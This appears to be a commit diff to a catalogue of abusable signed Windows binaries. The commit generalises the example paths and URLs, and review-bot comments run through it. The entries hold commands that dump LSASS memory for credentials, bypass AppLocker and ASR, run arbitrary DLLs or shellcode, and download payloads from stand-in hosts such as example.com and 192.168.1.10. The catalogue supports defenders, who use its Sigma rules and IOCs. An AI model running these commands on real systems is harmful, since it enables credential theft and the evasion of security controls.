Generalising file paths and urls, see #10 (#422)

Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions

View File

@@ -1,10 +1,10 @@
---
Name: AccCheckConsole.exe
Description: Verifies UI accessibility requirements
Author: 'bohops'
Author: bohops
Created: 2022-01-02
Commands:
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
- Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code from assembly DLL.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL (.NET)
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
- Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
Usecase: Local execution of managed code to bypass AppLocker.
Category: AWL Bypass

View File

@@ -4,14 +4,14 @@ Description: Debugging tool included with Windows Debugging Tools
Author: mr.d0x
Created: 2021-09-01
Commands:
- Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet
- Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
- Command: adplus.exe -c {PATH:.xml}
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
@@ -20,14 +20,14 @@ Commands:
OperatingSystem: All Windows
Tags:
- Execute: CMD
- Command: adplus.exe -c config-adplus.xml
- Command: adplus.exe -c {PATH:.xml}
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
- Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe}
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
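Review bot: the `-sc` argument on the last command of this hunk is generalised to `{PATH:.exe}`, but the Description on the next line says the entry executes arbitrary commands and binaries, so a command placeholder fits better; the cdb entry in this same commit uses `"{CMD}"` for the program-to-launch argument. Suggest `-sc {CMD}` unless `-sc` is known to accept only an executable path.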

View File

@@ -1,10 +1,10 @@
---
Name: AgentExecutor.exe
Description: Intune Management Extension included on Intune Managed Devices
Author: 'Eleftherios Panos'
Author: Eleftherios Panos
Created: 2020-07-23
Commands:
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
- Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument
Usecase: Execute unsigned powershell scripts
Category: Execute
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10
Tags:
- Execute: PowerShell
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
- Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1
Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully
Usecase: Execute a provided EXE
Category: Execute
Privileges: User
@@ -24,8 +24,6 @@ Commands:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml
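Review bot: the removal of the empty `Code_Sample:` / `- Code:` block in this hunk is not covered by the commit message, which only mentions generalising paths and URLs; the same removal recurs in many files in this commit (coregen, csi, DefaultPack, Devtoolslauncher, dnx, dsdbutil, Excel, Mftrace, Msdeploy, ntdsutil). Either mention it in the commit message or split it into its own commit so the schema change is visible in history.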

View File

@@ -4,7 +4,7 @@ Description: Windows App Certification Kit command-line tool.
Author: Avihay Eldad
Created: 2024-03-06
Commands:
- Command: appcert.exe test -apptype desktop -setuppath c:\windows\system32\notepad.exe -reportoutputpath c:\users\public\output.xml
- Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}
Description: Execute an executable file via the Windows App Certification Kit command-line tool.
Usecase: Performs execution of specified file, can be used as a defense evasion
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml
- Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml}
Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process.
Usecase: Execute custom made MSI file with malicious code
Category: Execute

View File

@@ -1,28 +1,19 @@
---
Name: Appvlp.exe
Description: Application Virtualization Utility Included with Microsoft Office 2016
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: AppVLP.exe \\webdav\calc.bat
- Command: AppVLP.exe {PATH_SMB:.bat}
Usecase: Execution of BAT file hosted on Webdav server.
Description: Executes calc.bat through AppVLP.exe
Description: Executes .bat file through AppVLP.exe
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: CMD
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 w/Office 2016
Tags:
- Execute: EXE
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)"
Usecase: Local execution of process bypassing Attack Surface Reduction (ASR).
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
Category: Execute
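Review bot: this hunk drops the RegisterXLL command instead of generalising it: the old line `AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"` is replaced by the ShellExecute command, and the hunk header (28 lines to 19) shows the earlier ShellExecute entry being removed, so the file goes from three commands to two. If the XLL technique is meant to stay, its path should become something like `RegisterXLL('{PATH_SMB:.xll}')`; if the removal is intentional (duplicate entry or no longer working), say so in the commit message.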

View File

@@ -1,11 +1,11 @@
---
Name: Bginfo.exe
Description: Background Information Utility included with SysInternals Suite
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
- Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
Description: Execute VBscript code that is referenced within the specified .bgi file.
Usecase: Local execution of VBScript
Category: Execute
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
- Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt
Description: Execute VBscript code that is referenced within the specified .bgi file.
Usecase: Local execution of VBScript
Category: AWL Bypass
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
- Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: Execute
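Review bot: the binary location `\\10.10.10.10\webdav\bginfo.exe` at the start of this command is still a literal IP-based UNC path while the `.bgi` argument has been generalised to `{PATH:.bgi}`; the hunks further down use `{PATH_SMB:.bgi}` for a remote file, so either generalise the executable's location the same way or state that the literal path is intentional for this remote-execution variant. The same applies to the next hunk (the AWL Bypass copy of this command).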
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: WSH
OperatingSystem: Windows
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
- Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: Execute bginfo.exe from a WebDAV server.
Category: AWL Bypass
@@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: WSH
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
- Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: Execute
@@ -50,7 +50,7 @@ Commands:
Tags:
- Execute: WSH
- Execute: Remote
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
- Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt
Usecase: Remote execution of VBScript
Description: This style of execution may not longer work due to patch.
Category: AWL Bypass

View File

@@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
- Command: cdb.exe -cf {PATH:.wds} -o notepad.exe
Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe.
Usecase: Local execution of assembly shellcode.
Category: Execute
Privileges: User
@@ -14,8 +14,8 @@ Commands:
Tags:
- Execute: Shellcode
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
cdb.exe -pd -pn {process_name}
.shell {CMD}
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
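Review bot: `{process_name}` in the new multi-line command is lowercase, whereas every other placeholder introduced by this commit is upper-case (`{CMD}` on the following line, `{PID}`, `{PATH:...}`); use `{PROCESS_NAME}` or whichever form the placeholder convention from #10 prescribes, so that templating code matching on placeholders does not miss it.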
@@ -24,7 +24,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: CMD
- Command: cdb.exe -c C:\debug-script.txt calc
- Command: cdb.exe -c {PATH:.txt} "{CMD}"
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute

View File

@@ -4,7 +4,7 @@ Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads
Author: Martin Sohn Christensen
Created: 2020-10-09
Commands:
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
- Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L.
Usecase: Execute DLL code
Category: Execute
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: DLL
- Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name
- Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions.
Usecase: Execute DLL code
Category: AWL Bypass
@@ -34,8 +34,6 @@ Commands:
Full_Path:
- Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe
- Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml
- IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\"

View File

@@ -4,7 +4,7 @@ Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: mr.d0x, Daniel Santos
Created: 2022-01-20
Commands:
- Command: createdump.exe -n -f dump.dmp [PID]
- Command: createdump.exe -n -f {PATH:.dmp} {PID}
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
Usecase: Dump process memory contents using PID.
Category: Dump

View File

@@ -1,10 +1,10 @@
---
Name: csi.exe
Description: Command line interface included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: csi.exe file
- Command: csi.exe {PATH:.cs}
Description: Use csi.exe to run unsigned C# code.
Usecase: Local execution of unsigned C# code.
Category: Execute
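Review bot: `csi.exe {PATH:.cs}` hints a `.cs` extension, but the rcsi.exe entry changed in this same commit uses `{PATH:.csx}`, and C# script files for the Roslyn scripting host conventionally use `.csx`; suggest `{PATH:.csx}` here for consistency.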
@@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml

View File

@@ -1,10 +1,10 @@
---
Name: DefaultPack.EXE
Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Description: This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.
Author: '@checkymander'
Created: 2020-10-01
Commands:
- Command: DefaultPack.EXE /C:"process.exe args"
- Command: DefaultPack.EXE /C:"{CMD}"
Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support.
Usecase: Can be used to execute stagers, binaries, and other malicious commands.
Category: Execute
@@ -15,8 +15,6 @@ Commands:
- Execute: CMD
Full_Path:
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml
- IOC: DefaultPack.EXE spawned an unknown process

View File

@@ -4,7 +4,7 @@ Description: Visual Studio 2019 tool
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: devinit.exe run -t msi-install -i https://example.com/out.msi
- Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi}
Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
Usecase: Executes code from a (remote) MSI file.
Category: Execute

View File

@@ -1,10 +1,10 @@
---
Name: Devtoolslauncher.exe
Description: Binary will execute specified binary. Part of VS/VScode installation.
Author: 'felamos'
Author: felamos
Created: 2019-10-04
Commands:
- Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test
- Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary.
Category: Execute
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7 and up with VS/VScode installed
Tags:
- Execute: CMD
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
- Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test
Description: The above binary will execute other binary.
Usecase: Execute any binary with given arguments.
Category: Execute
@@ -24,8 +24,6 @@ Commands:
- Execute: CMD
Full_Path:
- Path: 'c:\windows\system32\devtoolslauncher.exe'
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml
- IOC: DeveloperToolsSvc.exe spawned an unknown process

View File

@@ -1,11 +1,11 @@
---
Name: dnx.exe
Description: .Net Execution environment file included with .Net.
Author: 'Oddvar Moe'
Description: .NET Execution environment file included with .NET.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: dnx.exe consoleapp
Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
- Command: dnx.exe {PATH_ABSOLUTE:folder}
Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
Usecase: Local execution of C# project stored in consoleapp folder.
Category: Execute
Privileges: User
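Review bot: the Usecase line `Local execution of C# project stored in consoleapp folder.` still refers to the `consoleapp` example folder that this hunk removed from the Command and Description; update it to `... stored in the specified folder.` so the three fields agree.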
@@ -15,8 +15,6 @@ Commands:
- Execute: CSharp
Full_Path:
- Path: no default
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml

View File

@@ -1,11 +1,11 @@
---
Name: Dotnet.exe
Description: dotnet.exe comes with .NET Framework
Author: 'felamos'
Author: felamos
Created: 2019-11-12
Commands:
- Command: dotnet.exe [PATH_TO_DLL]
Description: dotnet.exe will execute any dll even if applocker is enabled.
- Command: dotnet.exe {PATH:.dll}
Description: dotnet.exe will execute any DLL even if applocker is enabled.
Usecase: Execute code bypassing AWL
Category: AWL Bypass
Privileges: User
@@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7 and up with .NET installed
Tags:
- Execute: DLL (.NET)
- Command: dotnet.exe [PATH_TO_DLL]
- Command: dotnet.exe {PATH:.dll}
Description: dotnet.exe will execute any DLL.
Usecase: Execute DLL
Category: Execute
@@ -31,7 +31,7 @@ Commands:
OperatingSystem: Windows 10 and up with .NET SDK installed
Tags:
- Execute: FSharp
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
- Command: dotnet.exe msbuild {PATH:.csproj}
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
Category: AWL Bypass

View File

@@ -44,8 +44,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\dsdbutil.exe
- Path: C:\Windows\SysWOW64\dsdbutil.exe
Code_Sample:
- Code:
Detection:
- IOC: Event ID 4688
- IOC: dsdbutil.exe process creation

View File

@@ -4,7 +4,7 @@ Description: Microsoft command line utility used to manage SQL Server Integratio
Author: Avihay Eldad
Created: 2024-06-17
Commands:
- Command: dtutil.exe /FILE C:\Windows\System32\calc.exe /COPY FILE;C:\Users\Public\calc.exe
- Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}
Description: Copy file from source to destination
Usecase: Use to copies the source file to the destination file
Category: Copy

View File

@@ -4,7 +4,7 @@ Description: Memory dump tool that comes with Microsoft Visual Studio
Author: mr.d0x
Created: 2021-11-16
Commands:
- Command: dump64.exe <pid> out.dmp
- Command: dump64.exe {PID} out.dmp
Description: Creates a memory dump of the LSASS process.
Usecase: Create memory dump and parse it offline to retrieve credentials.
Category: Dump
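Review bot: `dump64.exe {PID} out.dmp` generalises the PID but leaves the output file as the literal `out.dmp`, while the createdump entry in this commit uses `{PATH:.dmp}` for the same kind of argument; suggest `dump64.exe {PID} {PATH:.dmp}`. The Description (`Creates a memory dump of the LSASS process.`) also reads oddly now that the command takes an arbitrary PID.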

View File

@@ -4,7 +4,7 @@ Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
- Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
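Review bot: `--file {PATH_ABSOLUTE}` has no extension hint (the original was `dump.txt`), and `--processId 1132` is left as a literal where dump64 and createdump use `{PID}`; suggest `--file {PATH_ABSOLUTE:.dmp} --processId {PID}` (or `.txt` if the original extension was deliberate) for consistency with the rest of the commit.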

View File

@@ -1,11 +1,11 @@
---
Name: Dxcap.exe
Description: DirectX diagnostics/debugger included with Visual Studio.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
Description: 'Launch notepad.exe as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.'
- Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe}
Description: 'Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.'
Usecase: Local execution of a process as a subprocess of dxcap.exe
Category: Execute
Privileges: User

View File

@@ -4,7 +4,7 @@ Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
- Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
- Command: Excel.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
@@ -29,8 +29,6 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
- Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml
- IOC: Suspicious Office application Internet/network traffic

View File

@@ -4,7 +4,7 @@ Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotN
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
- Command: fsi.exe {PATH:.fsscript}
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

View File

@@ -4,7 +4,7 @@ Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
- Command: fsianycpu.exe {PATH:.fsscript}
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass

View File

@@ -1,11 +1,11 @@
---
Name: Mftrace.exe
Description: Trace log generation tool for Media Foundation Tools.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Mftrace.exe cmd.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
- Command: Mftrace.exe {PATH:.exe}
Description: Launch specified executable as a subprocess of Mftrace.exe.
Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
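Review bot: the Usecase `Local execution of cmd.exe as a subprocess of Mftrace.exe.` still names cmd.exe even though the Command and Description in this hunk were generalised to `{PATH:.exe}` / `specified executable`; update it to match, especially since the second hunk in this file removes the separate powershell.exe entry, leaving this generalised command to cover both cases.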
@@ -13,22 +13,11 @@ Commands:
OperatingSystem: Windows
Tags:
- Execute: EXE
- Command: Mftrace.exe powershell.exe
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Tags:
- Execute: EXE
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe
- Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:

View File

@@ -4,8 +4,8 @@ Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}
Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
Category: Execute
Privileges: User

View File

@@ -4,7 +4,7 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2023-04-30
Commands:
- Command: MSAccess.exe https://example.com/payload.exe.mdb
- Command: MSAccess.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache.
Category: Download
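Review bot: `MSAccess.exe {REMOTEURL}` loses the constraint spelled out in the Usecase two lines below (the download only happens if the filename extension is `.mdb`), which the original example `https://example.com/payload.exe.mdb` encoded in the URL; suggest `{REMOTEURL:.mdb}`, the form this commit already uses for devinit (`{REMOTEURL:.msi}`).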

View File

@@ -1,11 +1,11 @@
---
Name: Msdeploy.exe
Description: Microsoft tool used to deploy Web Applications.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
Description: Launch .bat file via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
Category: Execute
Privileges: User
@@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Description: Launch calc.bat via msdeploy.exe.
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
Description: Launch .bat file via msdeploy.exe.
Usecase: Local execution of batch file using msdeploy.exe.
Category: AWL Bypass
Privileges: User
@@ -22,7 +22,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server
Tags:
- Execute: CMD
- Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe
- Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext}
Description: Copy file from source to destination.
Usecase: Copy file.
Category: Copy
@@ -38,8 +38,6 @@ Full_Path:
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe
- Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe
- Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml
Resources:

View File

@@ -4,7 +4,7 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://example.com/payload
- Command: MsoHtmEd.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

View File

@@ -4,7 +4,7 @@ Description: Microsoft Publisher
Author: Nir Chako
Created: 2022-08-02
